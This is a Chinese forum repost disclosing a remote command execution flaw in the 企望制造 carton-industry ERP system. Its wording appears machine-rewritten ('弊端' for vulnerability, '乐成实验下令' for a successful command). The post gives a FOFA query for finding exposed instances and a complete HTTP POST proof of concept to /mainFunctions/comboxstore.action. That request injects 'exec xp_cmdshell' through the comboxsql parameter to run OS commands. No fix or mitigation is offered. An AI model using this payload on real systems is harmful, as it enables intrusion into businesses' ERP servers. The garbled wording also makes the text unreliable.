反转基因福娃 发表于 2024-10-5 02:00:48

企望制造ERP系统存在RCE弊端

弊端描述

企望制造纸箱业erp系统由深知纸箱行业特点和业务流程的多位IT专家打造,具有国际先辈的管理方式,将当代化的管理方式融入erp软件中,让企业分分钟就拥有科学的管理经验。erp的功能包括本钱核算、报价订价、订单下达、生产下单、现场管理等多种功能。
https://i-blog.csdnimg.cn/direct/649a6d5f87e344ee8da08287658a93a8.png
弊端复现

FOFA
title="企望制造ERP系统" POC
POST /mainFunctions/comboxstore.action HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=11E0339EEFC982D1B2E80005DD204F4F
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

comboxsql=exec%20xp_cmdshell%20'whoami' bp 乐成实验下令
https://i-blog.csdnimg.cn/direct/f33074e5f1854794a5adefeee3ce1b6f.png

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 企望制造ERP系统存在RCE弊端